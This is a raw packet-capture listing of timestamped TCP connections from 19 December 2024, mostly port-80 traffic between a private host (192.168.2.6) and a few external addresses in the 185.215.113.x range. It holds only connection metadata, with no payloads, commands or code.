Dec 19, 2024 10:10:31.573604107 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.573606014 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.573657990 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.574090958 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.574162006 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.574209929 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.574263096 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.574542999 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.574593067 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.574680090 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.574738979 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.575153112 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.575207949 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.575342894 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.575390100 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.575676918 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.575730085 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.575902939 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.575956106 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.576359987 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.576414108 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.576415062 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.576464891 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.576944113 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.576997995 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.577038050 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.577085972 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.577575922 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.577629089 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.577753067 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.577804089 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.578233957 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.578285933 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.578286886 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.578341961 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.578833103 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.578886032 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.578886986 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.578938961 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.579416990 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.579469919 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.579472065 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.579530001 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.580064058 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.580118895 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.580120087 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.580173969 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.580655098 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.580704927 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.580708981 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.580760956 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.581381083 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.581434011 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.581434965 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.581490040 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.582120895 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.582176924 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.582237959 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.582289934 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.582778931 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.582833052 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.582915068 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.582959890 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.583467960 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.583523035 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.583678961 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.583738089 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.584228039 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.584283113 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.584366083 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.584427118 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.585087061 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.585139990 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.585140944 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.585191965 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.585871935 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.585927010 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.585985899 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.586035013 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.586631060 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.586699009 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.586756945 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.586811066 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.587482929 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.587541103 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.587683916 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.587732077 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.588162899 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.588217974 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.588284969 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.588337898 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.588860035 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.588913918 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.588929892 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.588982105 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.589390993 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.589442968 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.589447021 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.589499950 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.589824915 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.589867115 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.589957952 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.590018034 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.590581894 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.590636015 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.590703964 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.590751886 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.591268063 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.591325045 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.594983101 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:31.595014095 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:31.595042944 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:31.595072031 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:31.595104933 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:31.595133066 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:31.747231960 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.747538090 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.747596979 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.747607946 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.747634888 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.747649908 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.747680902 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.748123884 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.748202085 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.748258114 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.748795033 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.748847008 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.748999119 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.749046087 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.749119043 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.749165058 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.749897003 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.749953985 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.750005960 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.750053883 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:33.298924923 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:33.298990011 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:33.568969011 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:33.689477921 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:33.977880001 CET	49904	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:33.978220940 CET	49927	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:34.009442091 CET	49703	80	192.168.2.6	23.54.80.57
Dec 19, 2024 10:10:34.009501934 CET	49701	443	192.168.2.6	20.190.181.3
Dec 19, 2024 10:10:34.010826111 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.010864019 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.010895014 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.010910034 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.013309002 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.013360023 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.013430119 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.013772011 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.021692991 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.021749973 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.021753073 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.021795988 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.030066013 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.030129910 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.030174017 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.030337095 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.038593054 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.038630962 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.038645983 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.038671017 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.046833038 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.046933889 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.046962976 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.046977043 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.098376036 CET	80	49904	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:34.098423958 CET	80	49927	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:34.098453045 CET	49904	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:34.098510981 CET	49927	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:34.098692894 CET	49927	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:34.132062912 CET	80	49703	23.54.80.57	192.168.2.6
Dec 19, 2024 10:10:34.132128000 CET	49703	80	192.168.2.6	23.54.80.57
Dec 19, 2024 10:10:34.132169962 CET	443	49701	20.190.181.3	192.168.2.6
Dec 19, 2024 10:10:34.132222891 CET	49701	443	192.168.2.6	20.190.181.3
Dec 19, 2024 10:10:34.144334078 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.144471884 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.144541979 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.144594908 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.148600101 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.148653030 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.148690939 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.148921013 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.155049086 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.155098915 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.155201912 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.155251980 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.162836075 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.162892103 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.162899971 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.162947893 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.169967890 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.170032024 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.170077085 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.170128107 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.204790115 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.204849958 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.204876900 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.204930067 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.206836939 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.206898928 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.207041979 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.207098007 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.213433981 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.213489056 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.213789940 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.213843107 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.218303919 CET	80	49927	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:34.221776009 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.221829891 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.221970081 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.222094059 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.230412960 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.230468035 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.230654001 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.230732918 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.238729954 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.238785982 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.238790989 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.238836050 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.248089075 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.248147964 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.248198986 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.270129919 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.270169020 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.270215988 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.273431063 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.273467064 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.273499012 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.273516893 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.278424025 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.278481007 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.278522015 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.278578997 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.286228895 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.286282063 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.286351919 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.286465883 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.294089079 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.294156075 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.294162989 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.294203997 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.333839893 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.333931923 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.334073067 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.334122896 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.337160110 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.337213039 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.337225914 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.337341070 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.343978882 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.344014883 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.344043016 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.344058990 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.352477074 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.352530003 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.352530956 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.352574110 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.359668016 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.359733105 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.359740973 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.359822989 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.365772009 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.365835905 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.365875959 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.365958929 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.370887041 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.370954990 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.371007919 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.371063948 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.377362013 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.377430916 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.377562046 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.377612114 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.383505106 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.383559942 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.383578062 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.383596897 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.396120071 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.396184921 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.396238089 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.396300077 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.397917032 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.397967100 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.398051023 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.398092985 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.401935101 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.401990891 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.401993036 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.402039051 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.405333042 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.405406952 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.405539989 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.405595064 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.409159899 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.409214020 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.409280062 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.409322977 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.413777113 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.413836002 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.413878918 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.413943052 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.417850018 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.417980909 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.418014050 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.418025017 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.422175884 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.422245026 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.422250032 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.422355890 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.425761938 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.425827980 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.425894976 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.425940037 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.429594994 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.429646015 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.429713011 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.429758072 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587090015 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587141991 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587177038 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587205887 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587234974 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587260008 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587265015 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587279081 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587318897 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587388039 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587423086 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587435007 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587460995 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587471008 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587496042 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587511063 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587532997 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587543011 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587569952 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587574005 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587605953 CET	80	49909	185.215.113.206	192.168.2.6
